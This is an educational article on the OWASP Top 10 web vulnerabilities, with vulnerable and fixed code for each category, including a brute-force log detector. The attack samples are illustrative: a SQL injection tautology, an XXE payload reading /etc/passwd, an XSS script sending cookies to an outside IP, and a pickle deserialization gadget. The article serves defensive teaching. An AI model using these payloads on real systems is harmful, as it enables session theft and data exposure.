
OWASP Top 10 Security Vulnerabilities: Real-World Examples


The OWASP Top 10 is an awareness document that lists the most critical web application security risks, and it is used as a baseline by security professionals and developers across all industries. OWASP (the Open Web Application Security Project) is a non-profit foundation, incorporated in 2004, whose goal is to help organisations build applications that are secure against common vulnerabilities.

Software development practices have changed over time, and so has the nature of attacks. OWASP periodically updates the list based on current vulnerability data and security trends.


We'll now examine each of the ten categories (this article follows the 2017 edition of the list) with real-world examples.

1. Injection

SQL injection occurs when a SQL statement is built dynamically from user-controlled input without validation or parameterisation. The attacker supplies crafted input that changes the structure of the statement rather than just its data values, and can use this to read sensitive information, modify or delete records, and so on. Below are examples of vulnerable and of fixed code.

Vulnerable code:

uName = getRequestString("username");
uPass = getRequestString("userpassword");
sql = 'SELECT * FROM Users WHERE Name ="' + uName + '" AND Pass ="' + uPass + '"';

Here uName and uPass are controlled by the user. If the attacker enters uName = admin and uPass = " OR 1=1 -- (the input begins with a double quote), the statement becomes:

SELECT * FROM Users WHERE Name ="admin" AND Pass ="" OR 1=1 --"

Because OR 1=1 is always true, and the -- comments out the trailing quote, the WHERE clause matches every row: the query returns the whole Users table and the application logs the attacker in as the first user returned, without a valid password. The fix is to use a prepared statement, as shown below.

Fixed:

String uName = // user input
String uPass = // user input
Connection connection = DriverManager.getConnection(...);
// Placeholders keep the statement text fixed; the values are sent separately
// and can never be interpreted as SQL.
PreparedStatement statement = connection.prepareStatement(
    "SELECT * FROM Users WHERE Name = ? AND Pass = ?");
statement.setString(1, uName);
statement.setString(2, uPass);
ResultSet rs = statement.executeQuery();
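The same login flow, reproduced in Python against an in-memory SQLite table so that the vulnerable and the parameterised query can be run side by side. This is an added example, not code from the original article; the Users rows are constructed sample data, and single-quoted SQL string literals are used because SQLite treats double-quoted strings as identifiers (the injection has exactly the same shape as the article's " OR 1=1 input).

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the article's Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Name TEXT, Pass TEXT, IsAdmin INTEGER)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?, ?)",
        [("admin", "s3cret-admin", 1), ("alice", "alice-pw", 0)],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, uname, upass):
    """String concatenation: the user's input becomes part of the SQL grammar."""
    sql = f"SELECT Name FROM Users WHERE Name = '{uname}' AND Pass = '{upass}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, uname, upass):
    """Parameterised query: the driver sends the values separately from the
    statement text, so a quote in the input is just a character in a string."""
    sql = "SELECT Name FROM Users WHERE Name = ? AND Pass = ?"
    row = conn.execute(sql, (uname, upass)).fetchone()
    return row[0] if row else None


def demo():
    conn = make_db()
    payload = "' OR 1=1 --"  # closes the Pass literal, adds a tautology, comments out the rest
    return {
        "vulnerable": login_vulnerable(conn, "admin", payload),  # logged in without a password
        "safe": login_safe(conn, "admin", payload),              # no row matches
        "legit": login_safe(conn, "alice", "alice-pw"),          # normal login still works
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable query the attacker produces is SELECT Name FROM Users WHERE Name = 'admin' AND Pass = '' OR 1=1 --', which matches every row; the parameterised version compares the literal string ' OR 1=1 -- against the Pass column and matches nothing.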

2. Broken Authentication

Insufficient or weak authentication allows an attacker to take over accounts by guessing or stealing passwords and session tokens. Developers should enforce a strong password policy (and check new passwords against lists of known breached passwords), generate session identifiers with a cryptographically secure random generator, and offer multi-factor authentication.

In addition, controls such as account lockout or progressive rate limiting after repeated failed logins should be in place, so that automated brute-force and credential-stuffing attacks are stopped rather than allowed to run indefinitely.

3. Sensitive Data Exposure

Sensitive data is exposed in two main states. First, at rest: data saved on disk, in a database or in files should be encrypted, so that if the storage layer is compromised the stored data is not readable to the attacker.

Second, in transit: all data sent over the network should be encrypted with TLS, so that an attacker who intercepts the traffic somewhere in the middle can neither read nor tamper with it. This is what is meant by in-transit data security.

Note: passwords should never be stored in recoverable form. Store only a salted hash computed with a slow password-hashing function (bcrypt, scrypt, Argon2 or PBKDF2). Hashing is one-way, so even an attacker who copies the database cannot recover the password from the hash without guessing it, and the slow function makes each guess expensive.
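An added example (not code from the original article) that ties sections 2 and 3 together: a minimal login service that stores only salted PBKDF2-HMAC-SHA256 hashes, verifies them in constant time, locks an account after repeated failures, and issues session tokens from the operating system's CSPRNG. The lockout threshold (5 failures), lockout duration (15 minutes) and iteration count (600,000) are assumed values chosen for the example; the clock is injectable so that lockout expiry can be exercised without waiting.

```python
import hashlib
import hmac
import os
import secrets
import time


def hash_password(password: str, iterations: int = 600_000) -> dict:
    """Return a salted PBKDF2-HMAC-SHA256 record; the plaintext is never stored."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return {"salt": salt, "hash": digest, "iterations": iterations}


def verify_password(record: dict, password: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), record["salt"], record["iterations"]
    )
    return hmac.compare_digest(digest, record["hash"])


class AuthService:
    """Login service with password hashing, account lockout and random session tokens.

    max_failures, lockout_seconds and iterations are assumed defaults for this
    example; clock is injectable so lockout expiry is testable.
    """

    def __init__(self, max_failures=5, lockout_seconds=900,
                 iterations=600_000, clock=time.monotonic):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.iterations = iterations
        self.clock = clock
        self._users = {}      # username -> password record
        self._failures = {}   # username -> (count, locked_until)
        self._sessions = {}   # session token -> username
        # Dummy record so an unknown username costs the same time as a known one
        # (no username enumeration through response timing).
        self._dummy = hash_password("dummy-password", iterations)

    def register(self, username, password):
        self._users[username] = hash_password(password, self.iterations)

    def is_locked(self, username):
        _, locked_until = self._failures.get(username, (0, 0.0))
        return self.clock() < locked_until

    def login(self, username, password):
        """Return a session token on success, None on any failure (same answer
        for wrong password, unknown user and locked account)."""
        if self.is_locked(username):
            return None
        record = self._users.get(username, self._dummy)
        ok = verify_password(record, password) and username in self._users
        if ok:
            self._failures.pop(username, None)
            token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
            self._sessions[token] = username
            return token
        count, locked_until = self._failures.get(username, (0, 0.0))
        if count >= self.max_failures and self.clock() >= locked_until:
            count = 0   # previous lockout has expired; start a fresh window
        count += 1
        if count >= self.max_failures:
            locked_until = self.clock() + self.lockout_seconds
        self._failures[username] = (count, locked_until)
        return None

    def user_for_session(self, token):
        return self._sessions.get(token)

    def logout(self, token):
        self._sessions.pop(token, None)
```

Every failed attempt still runs the full hash computation (against a dummy record when the user does not exist), so the response time does not reveal whether a username is valid; the lockout check happens first so that a locked account cannot be brute-forced at all during the lockout window.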

4. XML External Entities

Many applications use XML documents to transfer data between the browser and the server, and an XML processor parses them on the server side. If attacker-controlled XML is parsed by a poorly configured parser, the parser evaluates the external entities referenced in the document, which lets the attacker read local files on the server or make the server fetch URLs of the attacker's choosing. The following XML document carries such a payload.


<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

In the snippet above the entity xxe is declared with SYSTEM "file:///etc/passwd", so wherever &xxe; appears the parser substitutes the contents of the server's passwd file, which then comes back to the attacker in the application's response. The same mechanism can be turned into other attacks: pointing the entity at an internal URL makes the parser act as a server-side request forgery (SSRF) proxy into the internal network, and recursively nested entities can exhaust the parser's memory (denial of service).

To fix the issue, disable DTD processing entirely where possible (most applications never need a DOCTYPE in their inputs), or at least disable resolution of external entities, and disable XInclude support as well.
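The fix described above, as an added example that is not part of the original article: a small XML parser built on Python's expat binding that refuses any document carrying a DOCTYPE before the DTD is processed, and additionally refuses external entity references in case one ever gets through. The payload constant is the article's XXE document; the benign order document is constructed sample input.

```python
from xml.parsers import expat


class DoctypeRejected(ValueError):
    """Raised when untrusted XML carries a DTD (the carrier for XXE payloads)."""


# The article's payload, embedded here as a test input.
XXE_PAYLOAD = b"""<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>"""

# Constructed benign input, the kind of document the application expects.
BENIGN = b"<order id='42'><item qty='2'>widget</item></order>"


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML into nested dicts {tag, attrs, text, children}, rejecting DTDs.

    The DOCTYPE handler fires as soon as expat sees <!DOCTYPE, before the
    internal subset (where <!ENTITY ...> lives) is read, so the entity is never
    even declared, let alone resolved.
    """
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE '{name}' is not allowed in untrusted input")

    def on_external_entity(context, base, system_id, public_id):
        # Defence in depth: never fetch anything on the parser's behalf.
        raise DoctypeRejected(f"external entity {system_id!r} refused")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity

    root = {"tag": None, "attrs": {}, "text": "", "children": []}
    stack = [root]

    def start(tag, attrs):
        node = {"tag": tag, "attrs": attrs, "text": "", "children": []}
        stack[-1]["children"].append(node)
        stack.append(node)

    def end(tag):
        stack.pop()

    def chars(text):
        # expat may deliver character data in several chunks; concatenate them.
        stack[-1]["text"] += text

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(data, True)
    return root["children"][0]


def is_rejected(data: bytes) -> bool:
    """True if the document is refused by the DTD guard."""
    try:
        parse_untrusted_xml(data)
    except DoctypeRejected:
        return True
    return False


if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN))
    print("payload rejected:", is_rejected(XXE_PAYLOAD))
```

Rejecting the DOCTYPE outright is the simplest configuration to get right: it removes XXE, SSRF through entities and entity-expansion denial of service in one step, and it also works with parsers that do not expose a separate "resolve external entities" switch.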

5. Broken Access Control

Access control means restricting resources to the users who are intended to use them. When an application fails to enforce this, attackers can reach data and functionality that were never meant for them. Below is a real-world pattern: an application that trusts user input without checking whether the caller is authorised to see the requested record.

Scenario 1: the application uses unverified data in a SQL query that retrieves account information:

pstmt.setString(1, request.getParameter("acct"));
ResultSet results = pstmt.executeQuery();

The query is parameterised, so it is not injectable, but nothing checks that the account belongs to the logged-in user. An attacker simply changes the acct parameter in the browser to any account number they want:
Service call: http://example.com/app/accountInfo?acct=1234
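The same lookup rewritten twice in Python against a constructed SQLite accounts table, as an added example that is not part of the original article. The vulnerable version mirrors the Java above (parameterised, but it never asks who is calling); the fixed version takes the caller's identity from the server-side session and enforces ownership inside the query. The account numbers, owners and the Forbidden exception are assumptions made for the example.

```python
import sqlite3


class Forbidden(Exception):
    """Raised when the caller is not authorised to see the requested account."""


def make_db():
    """Constructed sample accounts (not from the original article)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (acct INTEGER PRIMARY KEY, owner TEXT NOT NULL, balance INTEGER)"
    )
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [(1234, "alice", 500), (5678, "bob", 9000)],
    )
    conn.commit()
    return conn


def account_info_vulnerable(conn, acct_param):
    """Same shape as the article's Java: parameterised, so not injectable, but
    the acct value from the request is trusted and the caller is never checked
    (an insecure direct object reference)."""
    return conn.execute(
        "SELECT acct, owner, balance FROM accounts WHERE acct = ?", (acct_param,)
    ).fetchone()


def account_info_safe(conn, session_user, acct_param):
    """Ownership is enforced in the query against the identity taken from the
    server-side session, never from the request. A missing account and someone
    else's account look identical to the caller (deny by default)."""
    try:
        acct = int(acct_param)
    except (TypeError, ValueError):
        raise Forbidden("malformed account id") from None
    row = conn.execute(
        "SELECT acct, owner, balance FROM accounts WHERE acct = ? AND owner = ?",
        (acct, session_user),
    ).fetchone()
    if row is None:
        raise Forbidden(f"{session_user} may not access account {acct}")
    return row


def can_read(conn, session_user, acct_param) -> bool:
    """Convenience wrapper: does the access-controlled lookup succeed?"""
    try:
        account_info_safe(conn, session_user, acct_param)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    db = make_db()
    # alice is logged in but asks for bob's account, exactly as in the article.
    print("vulnerable:", account_info_vulnerable(db, "5678"))
    print("safe:", can_read(db, "alice", "5678"))
```

Putting the owner check into the WHERE clause, rather than fetching the row and comparing afterwards, means there is no code path that can forget the check, and the error message does not confirm that the other account exists.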

6. Security Misconfiguration

This is one of the most common security weaknesses across applications and systems. Many developers deploy with the default settings shipped by frameworks, application servers and cloud services. Those defaults are tuned for convenience rather than security (sample applications, default accounts, open management consoles, verbose errors) and leave the application exposed.

A typical case is leaving detailed error reporting switched on in production. When something fails, the browser receives a full stack trace, and with it sensitive details such as framework and component versions, internal file paths and sometimes configuration values, which an attacker uses to pick known exploits for those exact versions.
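A small illustration of that error-handling point, added here and not taken from the original article: the same failing request handler wrapped once with the verbose behaviour many frameworks ship by default (stack trace and version banner sent to the client) and once with the production setting (details logged server-side under an incident reference, generic message to the client). The ExampleApp version string and the incident-reference format are assumptions made for the example.

```python
import logging
import traceback
import uuid

APP_VERSION = "ExampleApp/2.3.1"   # hypothetical product/version banner


def failing_handler():
    """Stand-in for a request handler that hits an unexpected bug."""
    return 1 / 0


def respond_debug_defaults(handler):
    """Verbose defaults: the traceback (code paths, library names, versions)
    and a Server banner go straight to the client."""
    try:
        return 200, {"Server": APP_VERSION}, handler()
    except Exception:
        body = "500 Internal Server Error\n" + traceback.format_exc()
        return 500, {"Server": APP_VERSION}, body


def respond_hardened(handler, log=logging.getLogger("app")):
    """Production setting: full details stay in the server log, keyed by an
    incident id the user can quote to support; the client gets a generic
    message and no version banner."""
    try:
        return 200, {}, handler()
    except Exception:
        incident_id = uuid.uuid4().hex
        log.exception("unhandled error incident_id=%s", incident_id)
        return 500, {}, f"An internal error occurred. Reference: {incident_id}"


def leaks_internals(body: str, headers: dict) -> bool:
    """Does a response reveal stack frames or the software version?"""
    return "Traceback" in body or APP_VERSION in body or "Server" in headers


if __name__ == "__main__":
    for respond in (respond_debug_defaults, respond_hardened):
        status, headers, body = respond(failing_handler)
        print(respond.__name__, status, headers, "leaks:", leaks_internals(body, headers))
```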

7. Cross-Site Scripting XSS

Cross-site scripting (XSS) occurs when an application inserts user-controlled input into a web page without validating or properly escaping it. The attacker can then have arbitrary JavaScript execute in the victim's browser, in the context of the vulnerable site. This can be used to redirect the user to an attacker-controlled page, deface the page with injected UI elements, or steal the session cookie (unless the cookie is marked HttpOnly, which hides it from document.cookie). The example below is a script that sends the victim's cookies to an attacker-controlled server.

<script type="text/javascript">document.location="http://192.168.0.48:5000/?c="+document.cookie;</script>
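An added example (not code from the original article) showing the article's payload rendered into a page with and without output escaping, plus the caveat that escaping alone is not enough in an unquoted attribute. Rather than a browser, Python's standard HTMLParser is used as the judge of what would become a script tag or an event-handler attribute; the comment and search-box templates are constructed for the example.

```python
import html
from html.parser import HTMLParser

# The article's cookie-stealing payload, used here as attacker input.
ATTACKER_PAYLOAD = ('<script type="text/javascript">document.location='
                    '"http://192.168.0.48:5000/?c="+document.cookie;</script>')


def render_comment_vulnerable(author: str) -> str:
    """Untrusted input dropped straight into the markup."""
    return f"<p>Comment by {author}</p>"


def render_comment_safe(author: str) -> str:
    """Same template with HTML escaping: < > & " ' become entities."""
    return f"<p>Comment by {html.escape(author, quote=True)}</p>"


def render_input_unquoted(value: str) -> str:
    """Escaped but unquoted attribute: a space in the input ends the value and
    starts a new attribute, so onmouseover=... still gets through."""
    return f"<input name=q value={html.escape(value)}>"


def render_input_quoted(value: str) -> str:
    """Escaped and quoted: the whole input stays inside the attribute value."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


class ActiveContentFinder(HTMLParser):
    """Records what a browser would treat as executable: script tags and on* attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _ in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler attribute {name}")


def active_content(markup: str) -> list:
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    print(active_content(render_comment_vulnerable(ATTACKER_PAYLOAD)))
    print(active_content(render_comment_safe(ATTACKER_PAYLOAD)))
    print(active_content(render_input_unquoted("x onmouseover=alert(1)")))
    print(active_content(render_input_quoted("x onmouseover=alert(1)")))
```

Escaping has to match the context the data lands in: entity-encoding is the right tool for element text and for quoted attribute values, but it does nothing against attribute-boundary breaking in an unquoted attribute, and it is the wrong tool entirely for data placed inside a script block or a URL.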

8. Insecure Deserialization

Insecure deserialization vulnerabilities arise when an application deserializes data supplied by a user without any integrity check or restriction on the types it will reconstruct. Generic deserializers such as Java's ObjectInputStream.readObject() or Python's pickle module rebuild whatever object graph the data describes and, in doing so, invoke methods on attacker-chosen classes. An attacker can exploit this to achieve remote code execution on the server.
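An added example, not code from the original article, showing the pickle case end to end: a crafted object whose __reduce__ hook makes pickle call an arbitrary callable on load, and a restricted unpickler (the approach suggested in the pickle module's own documentation) that allow-lists the few globals the application actually needs. The callable used is os.getcwd, a harmless stand-in for the os.system-style calls a real attacker would choose; the EvilReport class and the SAFE_BUILTINS list are assumptions made for the example.

```python
import builtins
import io
import os
import pickle


class EvilReport:
    """Model of an attacker-crafted object. pickle serialises the return value
    of __reduce__ as "call this callable with these arguments at load time";
    nothing about the class itself survives, only the instruction."""

    def __reduce__(self):
        return (os.getcwd, ())   # harmless stand-in for os.system(...)


# Only plain data containers are needed by this (hypothetical) application.
SAFE_BUILTINS = {"set", "frozenset", "list", "dict", "tuple", "str", "int",
                 "float", "bool", "bytes", "range", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global reference that is not explicitly allow-listed."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo() -> dict:
    malicious = pickle.dumps(EvilReport())
    # Plain pickle.loads runs the attacker's callable: the "object" that comes
    # back is not an EvilReport at all but the string os.getcwd() returned.
    loaded = pickle.loads(malicious)
    ran_attacker_code = isinstance(loaded, str)
    try:
        restricted_loads(malicious)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    # Ordinary data still round-trips through the restricted loader.
    safe_data = pickle.dumps({"title": "Q1 report", "rows": [1, 2, 3]})
    return {
        "ran_attacker_code": ran_attacker_code,
        "blocked": blocked,
        "safe": restricted_loads(safe_data),
    }


if __name__ == "__main__":
    print(demo())
```

The allow-list approach has a cost: the application's own classes are also rejected unless they are added to find_class explicitly, which is the point. Where the data only ever comes from untrusted parties, the better fix is to not use a code-executing format at all and exchange JSON (or another pure-data format) validated against a schema instead.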

9. Using Components with Known Vulnerabilities

Application developers routinely build on open-source and other third-party components (libraries, frameworks, runtimes). These components must be inventoried and kept patched just like first-party code, because a known vulnerability in any of them is a vulnerability in the application. Keeping track of the components in use and checking them against published vulnerabilities is called software composition analysis (SCA).

10. Insufficient Logging & Monitoring

Logging and monitoring are the key link in the security event management chain, both for detecting an attack while it is in progress and for reconstructing it afterwards: good logs reveal the source and cause of an attack. SIEM products such as Splunk, and platforms such as CrowdStrike and Forcepoint, collect and analyse application and endpoint logs in order to detect malicious activity. Incident response (SOAR) platforms such as IBM Resilient can act on those alerts automatically by executing a predefined playbook of containment steps.
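What such monitoring does at its simplest, as an added example that is not part of the original article: a brute-force/credential-stuffing detector run over a constructed excerpt of an application's login log. The log format, the source addresses (from the 203.0.113.0/24 and 198.51.100.0/24 documentation ranges), and the alert threshold of five failures within five minutes are all assumptions made for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed application log excerpt (not from the original article).
LOG_LINES = [
    "2024-05-01T10:00:01+00:00 login_failed user=alice src=203.0.113.5",
    "2024-05-01T10:00:03+00:00 login_failed user=bob src=203.0.113.5",
    "2024-05-01T10:00:09+00:00 login_success user=carol src=198.51.100.7",
    "2024-05-01T10:00:12+00:00 login_failed user=carol src=203.0.113.5",
    "2024-05-01T10:00:20+00:00 login_failed user=dave src=203.0.113.5",
    "this line is not in the expected format and must be skipped",
    "2024-05-01T10:00:31+00:00 login_failed user=erin src=203.0.113.5",
    "2024-05-01T10:01:05+00:00 login_failed user=carol src=198.51.100.7",
    "2024-05-01T10:01:10+00:00 login_success user=carol src=198.51.100.7",
    "2024-05-01T10:20:00+00:00 login_failed user=frank src=203.0.113.5",
]

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<event>login_\w+) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_line(line: str):
    """Return a dict for a well-formed line, None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.fromisoformat(event["ts"])
    return event


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=5)):
    """Sliding-window count of login failures per source address.

    An alert is raised when a source accumulates `threshold` failures inside
    `window`; the window is then cleared so one burst produces one alert.
    """
    recent = defaultdict(deque)   # src -> deque of (timestamp, user)
    alerts = []
    for line in lines:
        event = parse_line(line)
        if event is None or event["event"] != "login_failed":
            continue
        q = recent[event["src"]]
        q.append((event["ts"], event["user"]))
        while q and event["ts"] - q[0][0] > window:
            q.popleft()
        if len(q) >= threshold:
            alerts.append({
                "src": event["src"],
                "first_seen": q[0][0],
                "last_seen": event["ts"],
                "failures": len(q),
                "users": sorted({user for _, user in q}),
            })
            q.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(LOG_LINES):
        print(alert)
```

The alert carries the list of distinct usernames tried, which is what distinguishes credential stuffing (many users, one source) from a user who has simply forgotten a password, and the malformed line is skipped rather than crashing the detector, since a monitoring job that dies on one bad line stops watching everything else.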

Application developers, security engineers and other professionals should test the code base against these web vulnerabilities before releasing applications to production. The OWASP Top 10 is a useful checklist for that testing.

It was a pleasure to share the OWASP Top 10 list with you. I hope you enjoyed reading.
